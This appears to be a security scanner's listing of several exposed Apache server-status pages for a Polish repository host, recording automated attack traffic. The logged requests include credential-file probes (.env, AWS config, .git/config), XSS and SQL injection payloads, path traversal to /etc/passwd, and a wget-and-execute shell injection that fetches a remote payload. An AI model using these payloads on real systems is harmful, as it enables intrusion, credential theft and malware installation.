0.060239756790.00.0115.05 138.68.144.227http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-128137870/2/2485_ 0.060259203930.00.0114.70 138.68.144.227http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-128137870/1/2529_ 0.01008737240.00.0014.94 78.153.140.224http/1.1 1-128137870/2/2352_ 0.060269033850.00.0215.12 138.68.144.227http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-128137870/1/2377_ 0.01108744900.00.0014.74 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-128137870/1/2502_ 0.0236209292570.00.0015.96 78.153.140.224http/1.1 1-128137870/1/2539_ 0.0236209444340.00.0015.50 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /docker.env HTTP/1.1 1-128137870/1/2607_ 0.0236208960670.00.0014.73 78.153.140.224http/1.1 1-128137870/1/2541_ 0.0236209236590.00.0014.25 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /css/.env HTTP/1.1 1-128137870/1/2604_ 0.0236209510910.00.0017.04 78.153.140.224http/1.1 1-128137870/2/2435_ 0.0236208800350.00.0114.59 78.153.140.224http/1.1vm-repo-prd.nimoz.local:80GET /cron/.env HTTP/1.1 2-86159040/2326/2801_ 143.58363289003210.014.3818.14 78.153.140.224http/1.1 2-86159040/2429/2846_ 144.0536208836810.014.6317.30 78.153.140.224http/1.1 2-86
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448db76c04b
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 24-Oct-2024 01:04:57 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 127 Parent Server MPM Generation: 126 Server uptime: 125 days 12 hours 31 minutes 48 seconds Server load: 0.00 0.00 0.00 Total accesses: 304220 - Total Traffic: 35.4 GB - Total Duration: 126625795 CPU Usage: u200.48 s162.5 cu842.62 cs119.95 - .0122% CPU load .0281 requests/sec - 3507 B/second - 122.1 kB/request - 416.231 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 37546no0yes025000 47545no0yes124000 Sum300 174000 ..................................................______________ _________________________________________W___________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-123-0/0/2434. 0.002422024259058600.00.0016.55 62.210.101.194http/1.1repo.nimoz.pl:443POST /spre/auth/login HTTP/1.1 0-123-0/0/2268. 0.002422024139447350.00.0013.76 62.210.101.194http/1.1repo.nimoz.pl:443GET /qcubed/assets/php/_devtools/installer/step_2.php?installat 0-123-0/0/2453. 0.002422024618931890.00.0018.18 62.210.101.194http/1.1repo.nimoz.pl:443GET /phpMyAdmin/index.php HTTP/1.1 0-123-0/0/2437. 0.0024220220358805970.00.0014.15 62.210.101.194http/1.1repo.nimoz.pl:443GET //https://148.81.110.91:443oast.me/ HTTP/1.1 0-123-0/0/2453. 0.002422024849481550.00.0014.64 62.210.101.194http/1.1repo.nimoz.pl:443GET /sap/public/bc/icf/logoff?redirecturl=https://interact.sh H 0-123-0/0/2335. 0.002422025009493010.00.0013.95 62.210.101.194http/1.1repo.nimoz.pl:443GET /api/users/admin/check HTTP/1.1 0-123-0/0/2259. 0.002422024719501690.00.0013.62 62.210.101.194http/1.1repo.nimoz.pl:443GET /steve/services/%22%3E%3Cscript%3Ealert%28document.domain%2 0-123-0/0/2473. 0.0024220228020302680.00.001534.17 62.210.101.194http/1.1repo.nimoz.pl:443POST /search.php?searchtype=5 HTTP/1.1 0-123-0/0/2479. 0.002422024939231220.00.0035.33 62.210.101.194http/1.1repo.nimoz.pl:443GET /_phpmyadmin/index.php HTTP/1.1 0-123-0/0/2263. 0.002422022918984860.00.0013.75 62.210.101.194http/1.1repo.nimoz.pl:443GET /pma/index.php HTTP/1.1 0-123-0/0/2544. 0.0024220212289618980.00.0017.77 62.210.101.194http/1.1repo.nimoz.pl:443GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click& 0-123-0/0/2834. 0.0024220259798204010.00.0031190.80 62.210.101.194http/1.1repo.nimoz.pl:443GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1 0-123-0/0/2208. 0.002422025639081280.00.0014.83 62.210.101.194http/1.1repo.nimoz.pl:443GET /admin/dashboard.php HTTP/1.1 0-123-0/0/2373. 0.002422024558826410.00.0016.38 62.210.101.194http/1.1repo.nimoz.pl:443GET /phpmyadmin/index.php HTTP/1.1 0-123-0/0/2345. 0.0024220209248170.00.0039.42 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80POST /hybridity/api/sessions HTTP/1.1 0-123-0/0/2474. 0.0024220233098718510.00.0013.92 62.210.101.194http/1.1repo.nimoz.pl:443GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27% 0-123-0/0/2459. 0.002422025909166910.00.0015.41 62.210.101.194http/1.1repo.nimoz.pl:443GET /api/imageProxy?url=https://raw.githubusercontent.com/proje 0-123-0/0/2324. 0.002422029859400820.00.0016.58 62.210.101.194http/1.1repo.nimoz.pl:443GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1. 0-123-0/0/2430. 0.002422024578749480.00.0013.17 62.210.101.194http/1.1repo.nimoz.pl:443GET /pmd/index.php HTTP/1.1 0-123-0/0/2283. 0.00242202113911523570.00.00189.75 62.210.101.194http/1.1repo.nimoz.pl:443GET /148.81.sql.tar.z HTTP/1.1 0-123-0/0/2473. 0.0024220213639681300.00.0013.88 62.210.101.194http/1.1repo.nimoz.pl:443GET /backups.sql.zip HTTP/1.1 0-123-0/0/2361. 0.002422024319613690.00.0015.35 62.210.101.194http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 0-123-0/0/2397. 0.0024220209239780.00.0015.16 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 0-123-0/0/2501. 0.002422023928849660.00.0013.92 62.210.101.194http/1.1repo.nimoz.pl:443GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extra 0-123-0/0/2453. 0.0024220211339055680.00.0018.42 62.210.101.194http/1.1repo.nimoz.pl:443GET /download.php?file=../../../../../etc/passwd HTTP/1.1 1-123-0/0/2618. 0.001766903189977120.00.0018.68 62.210.101.194http/1.1repo.nimoz.pl:443GET /wp-content/plugins/under-construction-maintenance-mode/rea 1-123-0/0/2339. 0.0017669009267620.00.0015.12 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /telescope/requests HTTP/1.1 1-123-0/0/2495. 0.0017669008865730.00.0016.89 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /laravel/.env HTTP/1.1 1-123-0/0/2432. 0.0017669009045440.00.0014.88 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /config.json HTTP/1.1 1-123-0/0/2487. 0.0017669009051010.00.0018.08 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /config/aws.yml HTTP/1.1 1-123-0/0/2509. 0.001766902589673530.00.0016.99 62.210.101.194http/1.1repo.nimoz.pl:443GET /login/index.php HTTP/1.1 1-123-0/0/2518. 0.00176690679198040.00.0015.43 122.180.31.234http/1.1 1-123-0/0/2460. 0.0017669009048960.00.0015.01 185.191.126.248http/1.1 1-123-0/0/2398. 0.0017669008790410.00.0014.33 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 1-123-0/0/2462. 0.00176690259875840.00.0016.32 3.17.161.12http/1.1repo.nimoz.pl:443GET /_profiler/empty/search/results HTTP/1.1 1-123-0/0/2461. 0.001766901589302820.00.0015.40 64.225.75.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-123-0/0/2494. 0.001766903239179180.00.0015.24 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-123-0/0/2642. 0.001766902459328250.00.0016.05 62.210.101.194http/1.1repo.nimoz.pl:443GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 1-123-0/0/2379. 0.001766904178645620.00.0014.51 13.64.194.101h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-123-0/0/2513. 0.00176690689756310.00.0015.03 62.210.101.194http/1.1repo.nimoz.pl:443GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1 1-123-0/0/2480. 0.0017669009202940.00.0014.65 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /storage/.env HTTP/1.1 1-123-0/0/2528. 0.00176690638737240.00.0014.94 62.210.101.194http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 1-123-0/0/2348. 0.001766902739033010.00.0015.07 122.180.31.234http/1.1 1-123-0/0/2376. 0.001766902508744900.00.0014.74 122.180.31.234http/1.1 1-123-0/0/2498. 0.0017669009292090.00.0015.93 122.180.31.234http/1.1 1-123-0/0/2535. 0.0017669009443820.00.0015.47 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /sendgrid.env HTTP/1.1 1-123-0/0/2602. 0.001766901168959890.00.0014.69 64.225.75.246http/1.1 1-123-0/0/2537. 0.001766900
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44828e9a8fb
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Monday, 21-Oct-2024 23:52:10 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 124 Parent Server MPM Generation: 123 Server uptime: 123 days 11 hours 19 minutes 1 second Server load: 0.00 0.00 0.00 Total accesses: 303491 - Total Traffic: 35.4 GB - Total Duration: 126615061 CPU Usage: u209.66 s159.97 cu826.5 cs118.78 - .0123% CPU load .0284 requests/sec - 3565 B/second - 122.4 kB/request - 417.195 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 131438no0yes025000 215904no (old gen)0yes025000 331308no0yes124000 431178no0yes025000 Sum400 199000 ........................._______________________________________ ________________W____________________________________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-123-0/0/2434. 0.00650354259058600.00.0016.55 62.210.101.194http/1.1repo.nimoz.pl:443POST /spre/auth/login HTTP/1.1 0-123-0/0/2268. 0.00650354139447350.00.0013.76 62.210.101.194http/1.1repo.nimoz.pl:443GET /qcubed/assets/php/_devtools/installer/step_2.php?installat 0-123-0/0/2453. 0.00650354618931890.00.0018.18 62.210.101.194http/1.1repo.nimoz.pl:443GET /phpMyAdmin/index.php HTTP/1.1 0-123-0/0/2437. 0.006503520358805970.00.0014.15 62.210.101.194http/1.1repo.nimoz.pl:443GET //https://148.81.110.91:443oast.me/ HTTP/1.1 0-123-0/0/2453. 0.00650354849481550.00.0014.64 62.210.101.194http/1.1repo.nimoz.pl:443GET /sap/public/bc/icf/logoff?redirecturl=https://interact.sh H 0-123-0/0/2335. 0.00650355009493010.00.0013.95 62.210.101.194http/1.1repo.nimoz.pl:443GET /api/users/admin/check HTTP/1.1 0-123-0/0/2259. 0.00650354719501690.00.0013.62 62.210.101.194http/1.1repo.nimoz.pl:443GET /steve/services/%22%3E%3Cscript%3Ealert%28document.domain%2 0-123-0/0/2473. 0.006503528020302680.00.001534.17 62.210.101.194http/1.1repo.nimoz.pl:443POST /search.php?searchtype=5 HTTP/1.1 0-123-0/0/2479. 0.00650354939231220.00.0035.33 62.210.101.194http/1.1repo.nimoz.pl:443GET /_phpmyadmin/index.php HTTP/1.1 0-123-0/0/2263. 0.00650352918984860.00.0013.75 62.210.101.194http/1.1repo.nimoz.pl:443GET /pma/index.php HTTP/1.1 0-123-0/0/2544. 0.006503512289618980.00.0017.77 62.210.101.194http/1.1repo.nimoz.pl:443GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click& 0-123-0/0/2834. 0.006503559798204010.00.0031190.80 62.210.101.194http/1.1repo.nimoz.pl:443GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1 0-123-0/0/2208. 0.00650355639081280.00.0014.83 62.210.101.194http/1.1repo.nimoz.pl:443GET /admin/dashboard.php HTTP/1.1 0-123-0/0/2373. 0.00650354558826410.00.0016.38 62.210.101.194http/1.1repo.nimoz.pl:443GET /phpmyadmin/index.php HTTP/1.1 0-123-0/0/2345. 0.006503509248170.00.0039.42 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80POST /hybridity/api/sessions HTTP/1.1 0-123-0/0/2474. 0.006503533098718510.00.0013.92 62.210.101.194http/1.1repo.nimoz.pl:443GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27% 0-123-0/0/2459. 0.00650355909166910.00.0015.41 62.210.101.194http/1.1repo.nimoz.pl:443GET /api/imageProxy?url=https://raw.githubusercontent.com/proje 0-123-0/0/2324. 0.00650359859400820.00.0016.58 62.210.101.194http/1.1repo.nimoz.pl:443GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1. 0-123-0/0/2430. 0.00650354578749480.00.0013.17 62.210.101.194http/1.1repo.nimoz.pl:443GET /pmd/index.php HTTP/1.1 0-123-0/0/2283. 0.0065035113911523570.00.00189.75 62.210.101.194http/1.1repo.nimoz.pl:443GET /148.81.sql.tar.z HTTP/1.1 0-123-0/0/2473. 0.006503513639681300.00.0013.88 62.210.101.194http/1.1repo.nimoz.pl:443GET /backups.sql.zip HTTP/1.1 0-123-0/0/2361. 0.00650354319613690.00.0015.35 62.210.101.194http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 0-123-0/0/2397. 0.006503509239780.00.0015.16 62.210.101.198http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 0-123-0/0/2501. 0.00650353928849660.00.0013.92 62.210.101.194http/1.1repo.nimoz.pl:443GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extra 0-123-0/0/2453. 0.006503511339055680.00.0018.42 62.210.101.194http/1.1repo.nimoz.pl:443GET /download.php?file=../../../../../etc/passwd HTTP/1.1 1-123314380/6/2618_ 0.96148323189977120.00.0818.68 62.210.101.194http/1.1repo.nimoz.pl:443GET /wp-content/plugins/under-construction-maintenance-mode/rea 1-123314380/17/2339_ 0.991483209267620.00.1315.12 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /telescope/requests HTTP/1.1 1-123314380/8/2495_ 0.99742608865730.00.0916.89 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /laravel/.env HTTP/1.1 1-123314380/15/2432_ 0.991483209045440.00.1514.88 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /config.json HTTP/1.1 1-123314380/12/2487_ 0.99738709051010.00.0618.08 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /config/aws.yml HTTP/1.1 1-123314380/21/2509_ 0.96148322589673530.00.1916.99 62.210.101.194http/1.1repo.nimoz.pl:443GET /login/index.php HTTP/1.1 1-123314380/22/2518_ 0.787425679198040.00.0815.43 122.180.31.234http/1.1 1-123314380/24/2460_ 0.98303909048960.00.1315.01 185.191.126.248http/1.1 1-123314380/17/2398_ 0.991483208790410.00.1014.33 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /login.action HTTP/1.1 1-123314380/10/2461_ 0.78216871129875580.00.1116.30 80.75.212.9http/1.1 1-123314380/7/2461_ 0.7811589302820.00.1015.40 64.225.75.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-123314380/16/2494_ 0.94148333239179180.00.1115.24 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-123314380/11/2642_ 0.86148322459328250.00.0916.05 62.210.101.194http/1.1repo.nimoz.pl:443GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 1-123314380/9/2379_ 0.9414244178645620.00.1114.51 13.64.194.101h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-123314380/9/2513_ 0.8614832689756310.00.1115.03 62.210.101.194http/1.1repo.nimoz.pl:443GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1 1-123314380/6/2480_ 0.99742509202940.00.0714.65 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /storage/.env HTTP/1.1 1-123314380/15/2528_ 0.9414833638737240.00.1914.94 62.210.101.194http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 1-123314380/13/2348_ 0.7873872739033010.00.1115.07 122.180.31.234http/1.1 1-123314380/26/2376_ 0.9474262508744900.00.1614.74 122.180.31.234http/1.1 1-123314380/20/2498_ 0.96742609292090.00.1615.93 122.180.31.234http/1.1 1-123314380/20/2535_ 0.99742609443820.00.1415.47 122.180.31.234http/1.1vm-repo-prd.nimoz.local:80GET /sendgrid.env HTTP/1.1 1-123314380/9/2602_ 0.8601168959890.00.1114.69 64.225.75.246http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4486c797802
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Saturday, 19-Oct-2024 23:21:02 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 122 Parent Server MPM Generation: 121 Server uptime: 121 days 10 hours 47 minutes 54 seconds Server load: 0.00 0.00 0.00 Total accesses: 259398 - Total Traffic: 35.2 GB - Total Duration: 108349100 CPU Usage: u177.21 s154.73 cu750.58 cs113.43 - .0114% CPU load .0247 requests/sec - 3601 B/second - 142.3 kB/request - 417.694 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 123443no0yes025000 215904no (old gen)0yes025000 323444no0yes124000 Sum300 174000 ........................._______________________________________ _____________________________W______............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-119-0/0/2192. 0.0017045107860300.00.0015.55 178.215.238.68http/1.1vm-repo-prd.nimoz.local:80GET /login.rsp HTTP/1.1 0-119-0/0/2080. 0.00170451258216880.00.0012.88 199.45.154.154h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-119-0/0/2253. 0.0017045107780900.00.0017.22 46.174.191.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-119-0/0/2247. 0.0017045107766820.00.0013.37 198.98.54.234http/1.1vm-repo-prd.nimoz.local:80GET /command_port.ini HTTP/1.1 0-119-0/0/2209. 0.0017045108396610.00.0013.71 178.192.152.32http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-119-0/0/2137. 0.00170451248393920.00.0013.07 185.106.92.14http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-119-0/0/2061. 0.0017045108393270.00.0012.78 4.156.236.228http/1.1 0-119-0/0/2284. 0.00170451019047470.00.001533.42 198.235.24.93http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-119-0/0/2232. 0.0017045108116940.00.0034.41 217.15.165.91http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 0-119-0/0/1996. 0.0017045107844680.00.0012.76 89.243.219.163http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-119-0/0/2322. 0.0017045108419040.00.0016.90 51.15.104.9http/1.1 0-119-0/0/2628. 0.00170451096953600.00.0031189.94 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-119-0/0/2050. 0.0017045107710960.00.0014.10 172.168.24.66http/1.1vm-repo-prd.nimoz.local:80GET /actuator/health HTTP/1.1 0-119-0/0/2150. 0.0017045107780370.00.0015.56 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-119-0/0/2138. 0.0017045108231940.00.0038.60 205.210.31.170http/1.1 0-119-0/0/2162. 0.00170451257434300.00.0012.93 206.189.66.37http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 0-119-0/0/2233. 0.00170451218000580.00.0014.46 185.91.69.110http/1.1repo.nimoz.pl:443GET /mPlayer HTTP/1.1 0-119-0/0/2098. 0.0017045107955190.00.0015.78 197.53.155.188http/1.1vm-repo-prd.nimoz.local:80GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/ 0-119-0/0/2118. 0.0017045107651310.00.0012.22 217.15.165.91http/1.1 0-119-0/0/2068. 0.001704512510391290.00.00188.90 199.45.154.154http/1.1 0-119-0/0/2226. 0.0017045108321350.00.0012.91 80.91.223.149http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 0-119-0/0/2161. 0.00170451258488880.00.0014.41 34.140.203.88http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-119-0/0/2207. 0.00170451258109930.00.0014.21 217.15.165.91http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 0-119-0/0/2152. 0.0017045107749030.00.0012.89 220.158.159.173http/1.1 0-119-0/0/2211. 0.0017045108005050.00.0017.53 185.91.69.110http/1.1vm-repo-prd.nimoz.local:80GET stager64 HTTP/1.1 1-121234430/9/1932_ 1.42007357560.00.0215.14 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /info.php HTTP/1.1 1-121234430/9/1623_ 1.200276353340.00.0511.46 167.94.145.100http/1.1 1-121234430/8/1673_ 1.42318206375840.00.0512.98 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-di 1-121234430/8/1761_ 1.42318206799760.00.0411.04 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-121234430/12/1811_ 1.42228206730940.00.0514.60 179.43.191.98http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-121234430/13/1897_ 1.480217020320.00.0513.35 128.199.182.55http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-121234430/10/1764_ 1.481186546250.00.0611.54 128.199.182.55http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-121234430/10/1850_ 1.482236527330.00.0711.86 128.199.182.55http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-121234430/9/1824_ 1.483196296860.00.0811.13 128.199.182.55http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-121234430/11/1856_ 1.42106580550.00.0812.73 179.43.168.146http/1.1vm-repo-prd.nimoz.local:80GET /.git/config HTTP/1.1 1-121234430/7/1804_ 1.224236449940.00.0211.75 128.199.182.55http/1.1 1-121234430/7/1781_ 1.36506717710.00.0611.57 128.199.182.55h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121234430/12/1957_ 1.42507022900.00.0912.59 128.199.182.55http/1.1 1-121234430/8/1730_ 1.36606370250.00.0311.14 128.199.182.55http/1.1 1-121234430/8/1796_ 1.42607169700.00.0211.39 128.199.182.55h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121234430/10/1844_ 1.38606655350.00.0711.37 128.199.182.55http/1.1 1-121234430/13/1840_ 1.23706319250.00.0811.10 128.199.182.55h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121234430/7/1763_ 1.38706377930.00.0012.10 179.43.191.98http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-121234430/12/1689_ 1.438266220460.00.0911.04 128.199.182.55http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-121234430/6/1830_ 1.23110206424590.00.0012.42 4.255.100.242http/1.1 1-121234430/7/1839_ 1.38171106678300.00.0211.70 185.191.126.248http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-121234430/15/1987_ 1.42171206290750.00.0411.11 220.130.157.62http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-121234430/10/1798_ 1.42171706763560.00.0110.68 92.249.48.49http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-121234430/14/1892_ 1.42227706847380.00.0913.29 46.174.191.29http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 1-121234430/7/1754_ 1.272277276205370.00.0310.93 197.46.75.136http/1.1vm-repo-prd.nimoz.local:80GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/ 2-8615904
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44850096a88
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 18-Oct-2024 01:21:49 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 121 Parent Server MPM Generation: 120 Server uptime: 119 days 12 hours 48 minutes 41 seconds Server load: 0.00 0.00 0.00 Total accesses: 258651 - Total Traffic: 35.2 GB - Total Duration: 108341375 CPU Usage: u173.31 s152.25 cu749.33 cs113.35 - .0115% CPU load .025 requests/sec - 3658 B/second - 142.6 kB/request - 418.871 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 120440no0yes124000 215904no (old gen)0yes025000 320441no0yes025000 Sum300 174000 .........................___________W___________________________ ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-119-0/0/2192. 0.00489907860300.00.0015.55 178.215.238.68http/1.1vm-repo-prd.nimoz.local:80GET /login.rsp HTTP/1.1 0-119-0/0/2080. 0.004899258216880.00.0012.88 199.45.154.154h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-119-0/0/2253. 0.00489907780900.00.0017.22 46.174.191.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-119-0/0/2247. 0.00489907766820.00.0013.37 198.98.54.234http/1.1vm-repo-prd.nimoz.local:80GET /command_port.ini HTTP/1.1 0-119-0/0/2209. 0.00489908396610.00.0013.71 178.192.152.32http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-119-0/0/2137. 0.004899248393920.00.0013.07 185.106.92.14http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-119-0/0/2061. 0.00489908393270.00.0012.78 4.156.236.228http/1.1 0-119-0/0/2284. 0.004899019047470.00.001533.42 198.235.24.93http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-119-0/0/2232. 0.00489908116940.00.0034.41 217.15.165.91http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 0-119-0/0/1996. 0.00489907844680.00.0012.76 89.243.219.163http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-119-0/0/2322. 0.00489908419040.00.0016.90 51.15.104.9http/1.1 0-119-0/0/2628. 0.004899096953600.00.0031189.94 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-119-0/0/2050. 0.00489907710960.00.0014.10 172.168.24.66http/1.1vm-repo-prd.nimoz.local:80GET /actuator/health HTTP/1.1 0-119-0/0/2150. 0.00489907780370.00.0015.56 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-119-0/0/2138. 0.00489908231940.00.0038.60 205.210.31.170http/1.1 0-119-0/0/2162. 0.004899257434300.00.0012.93 206.189.66.37http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 0-119-0/0/2233. 0.004899218000580.00.0014.46 185.91.69.110http/1.1repo.nimoz.pl:443GET /mPlayer HTTP/1.1 0-119-0/0/2098. 0.00489907955190.00.0015.78 197.53.155.188http/1.1vm-repo-prd.nimoz.local:80GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/ 0-119-0/0/2118. 0.00489907651310.00.0012.22 217.15.165.91http/1.1 0-119-0/0/2068. 0.0048992510391290.00.00188.90 199.45.154.154http/1.1 0-119-0/0/2226. 0.00489908321350.00.0012.91 80.91.223.149http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 0-119-0/0/2161. 0.004899258488880.00.0014.41 34.140.203.88http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-119-0/0/2207. 